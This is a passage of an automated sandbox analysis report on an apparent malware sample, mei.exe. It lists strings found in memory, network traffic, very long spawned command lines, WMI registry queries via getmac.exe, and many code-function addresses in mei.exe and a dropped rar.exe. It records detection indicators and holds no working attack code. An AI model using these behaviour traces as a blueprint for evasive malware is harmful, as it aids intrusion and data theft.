              Source: mei.exe, 00000001.00000003.1790066765.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1781296895.000002E9141A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: mei.exe, 00000001.00000003.1790066765.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1781296895.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1769987569.000002E9141A5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1761527994.000002E9140EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: mei.exe, 00000001.00000003.1788725057.000002E91404C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E91417D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1761527994.000002E91417D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788857455.000002E91417D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91417B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1790066765.000002E91417D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819324595.000002E91417B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2029582916.000002E913C72000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2028960937.000002E913C2B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031913351.000002E913C74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: mei.exe, 00000001.00000003.1790066765.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1781296895.000002E9141A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: mei.exe, 00000001.00000002.2037321445.000002E9155C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmp, mei.exe, 00000001.00000002.2039113179.00007FFDFB289000.00000004.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: mei.exe, 00000001.00000002.2030942122.000002E913490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: mei.exe, mei.exe, 00000001.00000002.2039190548.00007FFDFB6D8000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035981021.000002E9145F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91401E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91401A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: cmd.exeProcess created: 65

              System Summary

              barindex
              Very long command line found
              Source: C:\Users\user\Desktop\mei.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\mei.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Writes or reads registry keys via WMI
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79DD2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,89_2_00007FF7D79DD2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A0B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,89_2_00007FF7D7A0B57C
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F716C0_2_00007FF6313F716C
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F62200_2_00007FF6313F6220
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E7CFC0_2_00007FF6313E7CFC
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F0DE80_2_00007FF6313F0DE8
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313D79000_2_00007FF6313D7900
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E3A940_2_00007FF6313E3A94
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E22540_2_00007FF6313E2254
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313EA2E00_2_00007FF6313EA2E0
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F0DE80_2_00007FF6313F0DE8
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E1A340_2_00007FF6313E1A34
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313EE9E00_2_00007FF6313EE9E0
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F649C0_2_00007FF6313F649C
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E1C400_2_00007FF6313E1C40
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E2D000_2_00007FF6313E2D00
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E7B480_2_00007FF6313E7B48
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313EE3600_2_00007FF6313EE360
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F6C200_2_00007FF6313F6C20
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E36900_2_00007FF6313E3690
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F9EA80_2_00007FF6313F9EA8
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E1E440_2_00007FF6313E1E44
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E7CFC0_2_00007FF6313E7CFC
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313EDECC0_2_00007FF6313EDECC
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313D1EF00_2_00007FF6313D1EF0
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E85800_2_00007FF6313E8580
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F1D940_2_00007FF6313F1D94
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F45CC0_2_00007FF6313F45CC
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E5DE00_2_00007FF6313E5DE0
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E20500_2_00007FF6313E2050
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F41300_2_00007FF6313F4130
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313D8F800_2_00007FF6313D8F80
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E18300_2_00007FF6313E1830
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFAC718A01_2_00007FFDFAC718A0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFB287B301_2_00007FFDFB287B30
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFB899F901_2_00007FFDFB899F90
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1B0A501_2_00007FFDFF1B0A50
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF2118501_2_00007FFDFF211850
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1A82901_2_00007FFDFF1A8290
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF200FC01_2_00007FFDFF200FC0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1FDE701_2_00007FFDFF1FDE70
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF198F101_2_00007FFDFF198F10
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1BBF401_2_00007FFDFF1BBF40
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF19FD601_2_00007FFDFF19FD60
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1D7E101_2_00007FFDFF1D7E10
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1E8DF01_2_00007FFDFF1E8DF0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1B7C901_2_00007FFDFF1B7C90
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1E9CD01_2_00007FFDFF1E9CD0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF193CA01_2_00007FFDFF193CA0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1A8CF01_2_00007FFDFF1A8CF0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF196D421_2_00007FFDFF196D42
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1B2D201_2_00007FFDFF1B2D20
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1ABB701_2_00007FFDFF1ABB70
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF216BE01_2_00007FFDFF216BE0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1F1A801_2_00007FFDFF1F1A80
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF209A701_2_00007FFDFF209A70
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF224AB01_2_00007FFDFF224AB0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF19AAB01_2_00007FFDFF19AAB0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1DCB501_2_00007FFDFF1DCB50
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF19E9801_2_00007FFDFF19E980
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1EF8901_2_00007FFDFF1EF890
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF2408A01_2_00007FFDFF2408A0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1969481_2_00007FFDFF196948
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1D59301_2_00007FFDFF1D5930
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1F87701_2_00007FFDFF1F8770
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1E87A01_2_00007FFDFF1E87A0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF24F8401_2_00007FFDFF24F840
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1A58501_2_00007FFDFF1A5850
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1928501_2_00007FFDFF192850
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF2246C01_2_00007FFDFF2246C0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1ED6A01_2_00007FFDFF1ED6A0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1CA6B51_2_00007FFDFF1CA6B5
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1DD7001_2_00007FFDFF1DD700
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1BC7201_2_00007FFDFF1BC720
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1BF5701_2_00007FFDFF1BF570
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1C46101_2_00007FFDFF1C4610
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1A25F01_2_00007FFDFF1A25F0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1994801_2_00007FFDFF199480
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1BB4901_2_00007FFDFF1BB490
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1F94F01_2_00007FFDFF1F94F0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1DE4F01_2_00007FFDFF1DE4F0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1943901_2_00007FFDFF194390
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1FF3601_2_00007FFDFF1FF360
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1D33701_2_00007FFDFF1D3370
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1964001_2_00007FFDFF196400
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF2173F01_2_00007FFDFF2173F0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1BD3F01_2_00007FFDFF1BD3F0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF23E4301_2_00007FFDFF23E430
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF2184301_2_00007FFDFF218430
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1B62C01_2_00007FFDFF1B62C0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1B52D01_2_00007FFDFF1B52D0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1AB3101_2_00007FFDFF1AB310
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF2043101_2_00007FFDFF204310
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1AC1C01_2_00007FFDFF1AC1C0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF2312501_2_00007FFDFF231250
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1A70C01_2_00007FFDFF1A70C0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1F40D01_2_00007FFDFF1F40D0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1940F01_2_00007FFDFF1940F0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFDFF1A11201_2_00007FFDFF1A1120
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003D72001_2_00007FFE003D7200
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00355DC01_2_00007FFE00355DC0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00311AD71_2_00007FFE00311AD7
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003362901_2_00007FFE00336290
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00311EE71_2_00007FFE00311EE7
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00311D981_2_00007FFE00311D98
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE0038A7401_2_00007FFE0038A740
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003111721_2_00007FFE00311172
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00311B541_2_00007FFE00311B54
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00311CC11_2_00007FFE00311CC1
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00348AA01_2_00007FFE00348AA0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00311A0F1_2_00007FFE00311A0F
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003116FE1_2_00007FFE003116FE
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00318BE01_2_00007FFE00318BE0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE0037CDA01_2_00007FFE0037CDA0
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE0031143D1_2_00007FFE0031143D
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003116131_2_00007FFE00311613
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003117F81_2_00007FFE003117F8
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00350F901_2_00007FFE00350F90
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE0031262B1_2_00007FFE0031262B
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003127161_2_00007FFE00312716
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003111811_2_00007FFE00311181
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003124EB1_2_00007FFE003124EB
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE0031149C1_2_00007FFE0031149C
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003833301_2_00007FFE00383330
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003113DE1_2_00007FFE003113DE
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003276301_2_00007FFE00327630
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE003121D51_2_00007FFE003121D5
              Source: C:\Users\user\Desktop\mei.exeCode function: 1_2_00007FFE00311C121_2_00007FFE00311C12
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 56_2_00007FFD9AC917D956_2_00007FFD9AC917D9
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79C188489_2_00007FF7D79C1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D17C889_2_00007FF7D79D17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79CB54089_2_00007FF7D79CB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D54C089_2_00007FF7D79D54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79C82F089_2_00007FF7D79C82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A241CC89_2_00007FF7D7A241CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D118089_2_00007FF7D79D1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79EAE1089_2_00007FF7D79EAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79CABA089_2_00007FF7D79CABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79F7B2489_2_00007FF7D79F7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D0A2C89_2_00007FF7D79D0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A118A889_2_00007FF7D7A118A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79F090489_2_00007FF7D79F0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A0190C89_2_00007FF7D7A0190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79F38E889_2_00007FF7D79F38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79C888489_2_00007FF7D79C8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D289089_2_00007FF7D79D2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79E67E089_2_00007FF7D79E67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D86C489_2_00007FF7D79D86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A286D489_2_00007FF7D7A286D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A0270089_2_00007FF7D7A02700
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79FA71089_2_00007FF7D79FA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A0071089_2_00007FF7D7A00710
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A1766089_2_00007FF7D7A17660
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79FF59C89_2_00007FF7D79FF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D859889_2_00007FF7D79D8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79EF5B089_2_00007FF7D79EF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A1260C89_2_00007FF7D7A1260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79F65FC89_2_00007FF7D79F65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79CA50489_2_00007FF7D79CA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79ED45889_2_00007FF7D79ED458
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A0546889_2_00007FF7D7A05468
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79EC3E089_2_00007FF7D79EC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A1832C89_2_00007FF7D7A1832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D236089_2_00007FF7D79D2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79F037489_2_00007FF7D79F0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79DD2C089_2_00007FF7D79DD2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A002A489_2_00007FF7D7A002A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A1131489_2_00007FF7D7A11314
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79C42E089_2_00007FF7D79C42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79E724489_2_00007FF7D79E7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79CF24C89_2_00007FF7D79CF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79DE21C89_2_00007FF7D79DE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A1226889_2_00007FF7D7A12268
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A081CC89_2_00007FF7D7A081CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A0216489_2_00007FF7D7A02164
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79E010489_2_00007FF7D79E0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A200F089_2_00007FF7D7A200F0
